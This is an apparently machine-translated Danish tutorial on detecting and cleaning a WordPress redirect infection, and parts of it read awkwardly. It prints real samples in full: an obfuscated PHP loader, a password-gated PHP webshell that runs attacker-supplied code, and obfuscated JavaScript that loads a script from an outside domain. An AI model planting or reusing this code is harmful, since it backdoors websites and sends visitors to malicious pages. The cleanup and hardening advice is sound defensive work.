Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress er bestemt den mest anvendte platform CMS (Content Management System) For både blogs og online startbutikker (med WooCommerce -modulet), hvilket gør det til det mest målrettede af computerangreb (hacking). En af de mest anvendte hackingoperationer sigter mod at omdirigere det kompromitterede websted til andre websider. Redirect WordPress Hack 2023 er en relativt ny malware, der påvirker for at omdirigere hele webstedet til spam -websider, eller som igen kan vira brugere computere.

Hvis dit websted udviklet på WordPress omdirigeres på et andet sted, er offeret allerede det berømte omdirigeringshack.

I denne tutorial finder du de nødvendige oplysninger og nyttige tip, gennem hvilke du kan afvise et websted, der er inficeret med omdirigering WordPress Hack (Virus Redirect). Gennem kommentarer kan du få yderligere oplysninger eller bede om hjælp.

Påvisning af virus, der omdirigerer WordPress -steder

Det pludselige og uberettigede fald i trafikken på webstedet, reducerer antallet af ordrer (i tilfælde af online butikker) eller annonceringskvitteringer er de første tegn på, at noget ikke stemmer. Opdagelse “Redirect WordPress Hack 2023” (Omdirigere virus) kan udføres og “visuel” Når du åbner webstedet, og du omdirigeres til en anden webside.

Fra erfaring er de fleste af webmalware -applikationer kompatible med internetbrowsere: Chrome, Firefox, Edge, Opera. Hvis du er en Mac -computerbruger, er disse vira ikke meget synlige i Safari -browseren. Safari -sikkerhedssystemet blokerer stiltiende disse ondsindede scripts.

Hvad skal du gøre, hvis du har et WordPress Hack Word Hack -viruswebsted

Jeg håber, at den første foranstaltning ikke er at få panik eller slette webstedet. Ikke engang virus- eller virusfiler skal slettes i den første fase. De indeholder værdifulde oplysninger, der kan hjælpe dig med at forstå, hvor sikkerhedsbruddet er, og hvad virussen har påvirket. Modus operandi.

Luk webstedet for offentligheden.

Hvordan lukker du et viruswebsted for besøgende? Det enkleste er at bruge DNS -manageren og slette sin IP til “EN” (domænenavn) eller definere en ikke-eksisterende IP. Således vil besøgende på webstedet blive beskyttet mod denne omdirigering af WordPress -hack, der kan tage dem på virus- eller spam -websider.

Hvis du bruger CloudFlare Som DNS -manager autentificerer du på din konto og sletter DNS -posterne “A” For domænenavnet. Således vil det område, der er berørt af virussen, forblive uden IP, og ikke kan fås adgang til fra internettet.

Kopier webstedets IP og gør “rute” for kun at få adgang til dig. Fra din computer.

Hvordan ændrer du den rigtige IP på et websted på Windows -computere?

Metoden bruges ofte til at blokere adgangen til bestemte websteder ved at redigere filen “Værter”.

1. Åbn Notepad eller anden teksteditor (med administratorrettigheder) og rediger filen “hosts“. Det er placeret i:

C:\Windows\System32\drivers\etc\hosts

2. i filen “Værter” tilføje “rute” til den rigtige IP på dit websted. IP slettet ovenfor fra DNS -manager.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Gem filen og få adgang til webstedet i browseren.

Hvis webstedet ikke åbnes, og du ikke begik en fejl i filen “Værter”, er sandsynligvis en DNS -cache.

For at slette DNS -cache på et Windows -operativsystem skal du åbne kommandoprompt, hvor du udfører ordren:

ipconfig /flushdns

Hvordan ændrer du den rigtige IP på et websted på Mac / MacBook -computere?

For Mac -computerbrugere er det lidt lettere at ændre den rigtige IP på et websted.

1. Åbn værktøjet Terminal.

2. Udfør kommandolinjen (kræver systemadgangskode til udførelse):

sudo nano /etc/hosts

3. Hvad angår Windows -computere, tilsættes det rigtige IP for domænet.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Gem ændringerne. Ctrl+X (y).

Når du har gjort “rute”, du er den eneste person, der kan få adgang til WordPress Hack Word Hack Virus -webstedet.

Fuld backup -websted – Filer og database

Selvom det er virus med “Omdirigere WordPress -hack”, anbefalingen er at lave en generel sikkerhedskopi af hele webstedet. Filer og database. Eventuelt kan du gemme en lokal kopi af begge filer i public / public_html såvel som databasen.

Identifikation af virus og modificerede filer af omdirigering WordPress Hack 2023

De vigtigste målfiler af WordPress Det er jeg index.php (ved roden), header.php, index.php og footer.php af WordPress aktive tema. Kontroller manuelt disse filer og identificer en ondskabsfuld kode eller et malware -script.

I 2023, en type virus “Omdirigere WordPress -hack” Sæt i index.php en form for form:

(Jeg anbefaler ikke, at du udfører disse koder!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Afkodet, dette Script malware Det er praktisk talt konsekvensen af ​​WordPress -webstedet. Det er ikke scriptet, der er grundlaget for malware -applikationen, men det er scriptet, der gør det muligt at omdirigere Virus -websiden. Hvis vi afkoder scriptet ovenfor, får vi:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

For at indikere alle filerne på serveren, der indeholder denne kode, er det godt at have adgang SSH til serveren for at køre check -up og administrationsfiler på Linux.

Relateret: Hvordan finder du ud af, om du har en virusblog eller ej, ved hjælp af Google -søgning. (WordPress Virus)

Nedenfor er to kommandoer, der bestemt er nyttige til at identificere for nylig ændrede filer og filer, der indeholder en bestemt kode (streng).

Hvordan ser du PHP -filerne ændret i de sidste 24 timer eller i et andet tidsinterval på Linux?

Kommando “find” Det er meget simpelt at bruge og tillader personalisering at indstille tidsperioden, det patch, hvor søgningen og typen af ​​filer er udført.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

I output modtager du oplysninger om den dato og det tidspunkt, hvor filen blev ændret, skrivning / læsning / udførelse tilladelser (chmod) og hvis gruppe / bruger tilhører.

Hvis du vil tjekke for flere dage siden, skal du ændre værdien “-mtime -1” eller brug “-mmin -360” I minutter (6 timer).

Hvordan leder du efter en kode (streng) inde i PHP -filer, Java?

Kommandolinje “finde” gennem hvilken du hurtigt kan finde alle PHP- eller Java -filer, der indeholder en bestemt kode, er som følger:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Bestilling vil søge og vise filer .php og .js indeholdende “uJjBRODYsU“.

Ved hjælp af de to ordrer ovenfor vil du nemt finde ud af, hvilke filer der er blevet ændret for nylig og indeholder malware -kode.

Fjerner malware fra de ændrede filer uden at gå på kompromis med den korrekte kode. I mit scenarie blev malware -koden placeret før åbningen <head>.

Ved udførelsen af ​​den første ordre “finde” Det er meget muligt at opdage nye filer på serveren, som ikke er WordPress eller sat der. Filer, der forkynder WordPress -hack -omdirigeringsvirus.

I det scenarie, der blev undersøgt af mig, optrådte formularerne på serveren “wp-log-nOXdgD.php“. Dette er filer “generation” som også indeholder malware -kode, der bruges af omdirigeringsvirus.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Formål med type filer “wp-log-*” Det er at sprede omdirigeringshackvirus og andre websteder, der er vært på serveren. Er en type malware -kode “webshell” sammensat af en Grundlæggende sektion (hvor nogle krypterede variabler er defineret) og O henrettelsesafsnit hvorfra angriberen prøver at indlæse og udføre en malware -kode i systemet.

Hvis der er en variabel POST kaldte ‘bh‘ og dens krypterede værdi MD5 er lig med “8f1f964a4b4d8d1ac3f0386693d28d03“, så ser scriptet ud til at skrive det krypterede indhold base64 af en anden variabel kaldet ‘b3‘ I en midlertidig fil og prøv derefter at inkludere denne midlertidige fil.

Hvis der er en variabel POST eller GET kaldte ‘tick'Scriptet vil svare med værdien MD5 af strengen “885“.

For at identificere alle filer på serveren, der indeholder denne kode, skal du vælge en streng, der er almindelig, og derefter udføre kommandoen over “find” (svarende til ovenstående). Slet alle filer, der indeholder denne malware -kode.

Sikkerhedsbrud drives af omdirigering af WordPress -hack

Mest sandsynligt når denne omdirigeringsvirus igennem WordPress Administration Brugerudnyttelse eller ved at identificere en Sårbart plugin hvilket tillader tilføjelse af brugere med administratorrettigheder.

For de fleste websteder, der er bygget på WordPress -platformen, er det muligt Redigering af temaer for temaer eller plugintil administrationsgrænsefladen (Dashboard). Således kan en ondsindet person tilføje filerne på temaet malware, der genererer scripts, der er præsenteret ovenfor.

Et eksempel på sådan malware er dette:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificeret i WordPress -temaoverskriften, umiddelbart efter åbning af etiketten <head>.

Det er ret vanskeligt at dekryptere dette JavaScript, men det er åbenlyst, at en anden webadresse mest sandsynligt bringer andre scripts til at oprette filer “wp-log-*” Om hvilke jeg talte ovenfor.

Søg og slet denne kode fra alle filer PHP påvirket.

Så vidt jeg kunne finde ud af, var denne kode manuelt tilføjet af en ny bruger med administrative privilegier.

Så for at forhindre tilføjelse af malware i instrumentbrættet er det bedst at deaktivere WordPress / plugins i instrumentbrættet.

Rediger filen wp-config.php og tilføj linjerne:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Når du har foretaget denne ændring, vil ingen WordPress -bruger være i stand til at redigere dashboard -filer.

Kontroller brugere med administratorens rolle

Nedenfor er en SQL -forespørgsel, du kan bruge til at søge brugere med administrator på WordPress -platformen:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Denne forespørgsel returnerer alle brugere i tabellen wp_users der tilskrev administratorens rolle. Forespørgslen er gjort til bordet wp_usermeta At søge i meta ‘wp_capabilities', Der indeholder oplysninger om brugernes roller.

En anden metode er at identificere dem fra: Dashboard → Users → All Users → Administrator. Men jeg praktiserer en bruger kan være skjult i instrumentbrætpanelet. Så den bedste måde at se brugere på “Administrator” WordPress er SQL -kommandoen ovenfor.

I mit tilfælde identificerede jeg i databasen brugeren med navnet “wp-import-user“. Ganske suggestiv.

Herfra kan du se datoen og det tidspunkt, hvor WordPress -brugeren blev oprettet. Brugeren af ​​brugeren er også meget vigtig, fordi han kiggede på serverlogfilerne. På denne måde kan du se al denne brugers aktivitet.

Slet brugere med administratorens rolle at du ikke ved det, så Skift dine adgangskoder til alle administrative brugere. Redaktør, forfatter, administrator.

Skift SQL -brugers adgangskode til databasen af det berørte websted.

Efter at have taget disse trin kan webstedet genstartes for alle brugere.

Bemærk dog, at det, jeg præsenterede ovenfor, er en af ​​de tusinder af spytte, som et websted er med omdirigering af WordPress Hack i 2023.

Hvis dit websted har været virus og har brug for hjælp, eller hvis du har bekymringer, er kommentarfeltet åbent.